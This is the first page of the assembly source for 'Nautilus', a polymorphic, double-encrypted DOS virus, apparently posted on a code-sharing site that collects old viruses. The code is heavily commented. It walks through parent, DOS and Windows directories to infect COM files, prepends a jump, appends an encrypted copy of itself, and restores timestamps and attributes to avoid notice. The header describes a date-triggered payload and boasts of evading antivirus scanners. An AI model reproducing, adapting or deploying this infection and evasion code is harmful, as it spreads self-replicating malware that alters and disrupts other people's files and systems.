nautilus.asm
来自「More than 800 virus code (old school) ju」· 汇编 代码 · 共 1,143 行 · 第 1/3 页
ASM
1,143 行
; NAME: Nautilus.com
; TYPE: Appending
; ENCRYPTION: Yes ( Double Morphing )
; INFECTS: COM
; ROI: 7 files per run ( Rate Of Infection )
; RESIDENT: No
; POLYMORPH: Yes ( Encryption Routines/Calls and Offset Finder Change )
; STEALTH: No
; DT: Yes ( Directory Transversal )
; REPAIRABLE: Yes
; PAYLOAD: Yes
; SIZE: 1,824 bytes
; AUTHOR: Sea4
; This is my finest creation so far. This is a polymorph with 131,072
; different variations of code, and then if you factor in the different
; XOR/ROR/ROL encryption values, it actually is more than 4*10^11 ( that
; is 400,000,000,000 ). It changes everything about itself that is not
; encrypted, so that the AV scanners have a hard time. It is named
; after the monstrous submarine in the Jules Verne book '20,000 Leagues Under
; the Sea'. It will activate on November 6 of every year, because its a
; significant day in the book. The bomb consists of writing a txt string to
; the end of all TXT files in the current directory, also on that day... no
; *.com files will run from 11pm to midnight and instead will display a text
; string. Some other significant things:
; 1) Will record its infector through the 'InfectedBy' variable
; 2) Saves the DTA so that command parameters passed to an infected
; file are not lost.
; 3) Will infect all read only / hidden / system files and restore attributes
; 4) Will restore DATE/TIME stamps to victem files, and text files
; 5) Will infect Dos and Windows directories + plus any previous directories
; of the one it was run from. And the .\windows\command directory too.
; 6) Will NOT destroy any infected files, and will restore Registers and
; stack pointer before returning control.
; 7) Will NOT infect any files smaller than the Dropper, and none bigger
; than 65,535-3*DropperSize
; 8) Will NOT infect more than 7 files per run
; 9) And it will randomly generate encryption/decryption values
;
; - Sea4 of the CodeBreakers
;
start:
jmp Virus_start ; Jumps to the start of the virus. This
; will change as the virus is appended to
; different size files.
Virus_start:
call Delta ; Now we have to get the delta offset. By
; calling Delta we push the address of 'pop bp'
; onto the stack.
Delta:
pop ax ; Put the address into BP so it can be used.
sub ax,offset delta ; Now this takes the distance that Delta is now
nop ; Occupy space so that this
nop ; takes up 10 bytes
xchg bp,ax ; now (BP) and subtracts where it started
; (Offset Delta). Understand?? Hopefully you do!
; Because most files are different sizes, and this
; virus just attaches itself to the end we have
; to find out where it is before it can do anything.
Decrypt: ; This is one spot modified by the Morphing
mov cx,cryptie-hidden ; Give length of area to decrypt to CX
lea si,[bp+hidden] ; Start of area to decrypt
mov di,si ; its also the destination for decrypted part
mov dl,[bp+DecVal1] ; Stores Decryption Value in dl
mov dh,[bp+Xor1val] ; Xor Value to be used in this call
nop ; 1 byte to make space for morphing
call Cryptie ; Decrypts the virus from here to the decryption
; routine.
Hidden: ; Only encrypted once, because this is the decrypt
; call for the second layer. This is modyfied by
; the Morphing.
mov cx,DCryptie-Dhidden ; Gets the size for the next area to decrypt
lea si,[bp+Dhidden] ; Puts the starting address of the secong layer of
; encryption into DI
mov di,si ; Then SI
mov dl,[bp+DecVal2] ; Decryption code value
mov dh,[bp+Xor2Val] ; Xor Value to be used by this call
nop ; 1 byte to take up space for morphing
call DCryptie ; Boom! Decrypts the second layer
DHidden: ; Area that is hidden with Double encryption
; Here we will write the saved bytes from the beggining of the file, back
; to where they belong, so that we may run the file as normal, after we
; infect some more files of course :)
lea di,100h ; We are gonna write the saved bytes to the start
; so we run the program as normal after we infect
; some files.
mov cx,03h ; The number of bytes we have to write back to start
lea si,[bp+saved] ; Notice the [bp+saved]. It accesses a memory locale
; that would be changed depending on infected file
; size. We just add our Delta offset to find out
; its exact location.
rep movsb ; Quickly restores the file so we can run it after
; we get through here.
; Save the DTA
NewDTA EQU Buffer+VirL
; It will be after the buffer needed for copying the virus
lea di,[bp+NewDTA] ; Puts the DTA after the buffer used by copying
; the virus.
mov si,80h ; DTA area that we must save
mov cx,2Ah ; Length of DTA = 42d bytes ( 2Ah )
rep movsb ; Puts it in a safe place
; Save the current directory so that control is restored in the
; right place after the virus has run.
mov ah,47h ; Function 47h: Get Current Directory
xor dx,dx ; 00h in DL = Default Drive
lea si,[bp+CurDIR] ; 64 byte buffer for pathname
int 21h ; Calls DOS to write current DIR to CurDIR
; Put the name of this file into 'Infectedby' so that
; the victem file knows who infected it :) MyName will be
; set when each file is found.
lea si,[bp+MyName] ; Name of the running file
lea di,[bp+Infectedby] ; Place where the victems will see their infector
mov cx,0Dh ; 0Dh bytes, length of name
rep movsb ; Moves it by bytes
pusha
call InfectDir ; Umm, maybe it infects the directory, I am not
; sure though.
popa
Chg_Dot_Dot: ; Go to '..' all the way to root dir infecting along the way
mov ah,3Bh ; Function 3Bh: Change Directory
lea dx,[bp+dot_dot] ; Dot_Dot mask
int 21h ; Calls DOS to go back 1 directory
jc Go_DOS ; Change Directory to DOS because it has a few
; frequently used COM files
pusha
call InfectDir ; Umm, maybe it infects the directory, I am not
; sure though.
popa
jmp Chg_Dot_Dot ; Do again, till we hit root directory
Go_DOS: ; Go to DOS
mov ah,3Bh ; Function 3Bh: Change Directory
lea dx,[bp+dos_mask] ; DOS
int 21h ; Calls DOS to go back 1 directory
jc Windows
pusha
call InfectDir ; Umm, maybe it infects the directory, I am not
; sure though.
pusha
Windows: ; Infect Windows DIR
; Got to move back to ROOT
mov ah,3Bh ; Function 3Bh: Change Directory
lea dx,[bp+dot_dot] ; Dot_Dot mask
int 21h ; Calls DOS to go back 1 directory
mov ah,3Bh ; Function 3Bh: Change Directory
lea dx,[bp+win_mask] ; win mask
int 21h ; Open windows DIR
jnc InfectWin
jmp WinCom
InfectWin:
pusha
call InfectDir ; Umm, maybe it infects the directory, I am not
; sure though.
popa
WinCom: ; Infect .\windows\command
mov ah,3Bh ; Function 3Bh: Change Directory
lea dx,[bp+win_com] ; command directory mask
int 21h ; Open command directory
jnc InfWinCom
jmp BadStuff
InfWinCom:
pusha
call InfectDir ; Umm, maybe it infects the directory, I am not
; sure though.
popa
jmp BadStuff
SavedDTAs EQU NewDTA+2Ah
InfectDir:
mov ax,4E00h ; Function 4Eh: Find First
Findnext: ; Findnext jmp point
lea dx,[bp+filemask] ; Gets the filemask = '*.com',0
mov cx,07h ; Find all file types
int 21h ; Tells DOS to find the *.com files
jnc Open ; Found one, now open it!
ret ; NONE left, lets jump back to changing directories
Open: ; Open/Encrypt/Infect routines
; Now we have to retrieve the name of the file to be infected
; so that we may put it into the MyName variable. The reason
; it is done this way is to delete extra characters that may
; have been left from longer filenames. :)
mov si,9Eh ; ASCIZ filename
lea di,[bp+MyName] ; Name of the file to be infected
mov cx,0Dh ; 0Dh (13d) bytes, name length
GetName:
lodsb ; Gets the next char of name
cmp al,00h ; Checks to see if the name is done
je DelRest ; If the name is done we blank out the other chars
stosb ; Store the character into MyName
loop GetName ; Gets the whole name this way
Delrest:
rep stosb ; Pushes 00h into the remaining chars if the filename
; is done before 13 chars
; Save attributes, then set them to 0, so we can
; modify this file. They are restored at 'Close'
lea si,[95h] ; Start of file attributes
mov cx,09h ; CX is enough to read: Attrib/Time/Date/Size
lea di,[bp+s_attr] ; Place to save all the file attribs
rep movsb ; Moves em to their new home ( to be restore later )
; Set attrib to 0
lea dx,[9Eh] ; Filename in DTA
mov ax,4301h ; Function 4301h: Set File Attributes
xor cx,cx ; Clear file attribs
int 21h ; Calls DOS to do 'our dirty work'
mov ax,3D02h ; Function 3Dh: Open File
; 02 = Read/Write access
mov dx,9Eh ; Location of ASCIZ filename
int 21h ; Calls DOS to open the file, with Read/Write access
; so that we can write the virus to it :)
xchg bx,ax ; Gives the file handle from AX to BX in one byte.
mov ah,3Fh ; Function 3Fh: Read from file
mov cx,03h ; We are gonna read the first 3 bytes. CX = # of bytes
; to read from file.
lea dx,[bp+saved] ; The location for the bytes to be stored when read.
int 21h ; Calls DOS to load the first 3 bytes of Victem file
; into the 'Saved' location so that it may run correctly.
mov al,0E9h ; Checks to see if it was a jump instruction
cmp al,[bp+saved] ; by matching E9h to the first byte of the file.
jne Uninfected ; It can't be infected by this virus because the file
; has NO jmp at its beggining.
mov ax,[80h+1Ah] ; Gets filesize
sub ax,Virl+3 ; subtracts JMP size and Virus Size
cmp ax,[bp+saved+1] ; See if the file is infected by THIS virus
jne Uninfected
Close:
jmp Infected
Uninfected:
; Check if file meets requirements for infection
mov ax,[9Ch] ; Get file offset size
cmp ax,0 ; see if its = 0
jnz Close ; If the file is larger than 64k we can't infect it,
; plus it might command.com or some other important file.
Filesize EQU Buffer-Start
mov ax,[80h+1Ah] ; Gets the filesize of the target file
cmp ax,FileSize ; If file is smaller than the 1st Gen. file, it is safe
jc Close ; so we jump to close
cmp ax,0FFFFh-(3*FileSize) ; If file is larger than AX
jnc Close ; Errors may occur
sub ax,03h ; Takes into account the length of the JMP instruction
mov [bp+jumpto],ax ; Puts the location to jmp to as the
; 2nd,3rd bytes of the buffer.
; Call Morph, changes the encryption routines and calls
push bx ; Saves BX
call Morph ; Calls the morphing routine
pop bx ; Retrieves BX
mov ax,4200h ; Function 42h: Move File Pointer
; 00h = beggining, after the read the FP moves 3 bytes
xor cx,cx ; 0 = CX
xor dx,dx ; 0 = DX
int 21h ; Calls DOS, this is explained a bit more with the
; next "Move File Pointer" instruction
mov ah,40h ; Function 40h: Write to file
mov cx,03 ; Number of bytes to write. CX = # of bytes
lea dx,[bp+jumping]; Start at buffer area, this will write the jump
; instruction to the beggining of the victem file.
int 21h ; Blammo! This is the jmp that skips over the normal
; file and heads write to the virus code. INT 21h tells
; DOS to write those three bytes.
mov ax,4202h ; Function 42h: Move File pointer
; 02 = End of file ( EOF )
xor cx,cx ; DX:CX is the offset from the File pointer location,
xor dx,dx ; since we want to be exactly at the EOF we clear DX:CX
int 21h ; Calls DOS to move the file pointer
; Write the Virus to memory
VirL EQU Ende-Virus_Start
; Length of Virus except jmp at beggining
lea si,[bp+Virus_Start] ; Start of virus
lea di,[bp+buffer] ; Area that it will be stored in mem
mov cx,VirL ; Length of it
rep movsb
; Now we have to modify it so that it is encrypted
DHiddenL EQU DCryptie-DHidden ; Length of area to encrypt that will
; end up double encrypted.
HiddenL EQU Cryptie-Hidden ; Length of single encrypt area
DHBufStart EQU DHidden-Virus_Start+Buffer ; Start of DHidden in buffer
HBufStart EQU Hidden-Virus_Start+Buffer ; Start of Hidden in Buffer
; More ways to clear up the clutter
; Here we encrypt All but the second and first Decrypt calls, and the
; decryption routines that go with em.
lea si,[bp+DHBufStart] ; Time to encrypt the first area that will then
mov di,si ; be encrypted again, giving us our Doubly Encrypted
; area.
mov cx,DHiddenL ; Length of this area
mov dl,[bp+EncVal2] ; ROL/ROR value
mov dh,[bp+Xor2Val] ; Xor value
call DCryptie ; Calls the Second Encryption routine
; because this will become decrypted by the first
; when infected files are run.
; Now we encrypt from Hidden to Cryptie ( while encrypting DHidden to
; DCryptie for the second time ) which makes this double encrypting.
lea si,[bp+HBufStart] ; Start of Hidden area in buffer
mov di,si ; You should know this one by now.
mov dl,[bp+EncVal1] ; ROR/ROL value
mov dh,[bp+Xor1Val] ; Xor value
mov cx,HiddenL ; Length of the area
call Cryptie ; Uhoh, now its encrypted and the AV software won't
; find it. Now what are we gonna do?
; ( Being sarcastic of course! )
; So we have the virus prepared for infecting :)
mov ah,40h ; Function 40h: Write to file ( everyone's fave )
lea dx,[bp+buffer] ; Start of virus in mem buffer
mov cx,VirL ; Length of it
int 21h ; Calls DOS to write this :)
inc byte ptr [bp+victems] ; Increase victem #
Infected: ; A place to jump in case the file is already infected
mov ax,5701h ; Function 5701h: Set File's Last - Written Date and Time
mov dx,word ptr [bp+s_date] ; DX = Date
mov cx,word ptr [bp+s_time] ; CX = Time
int 21h ; More Dirty work for DOS
mov ah,3Eh ; Function 3Eh: Close File
int 21h ; Calls DOS to close up the file.
mov ax,4301h ; Function 4301h: Set File Attributes
⌨️ 快捷键说明
复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?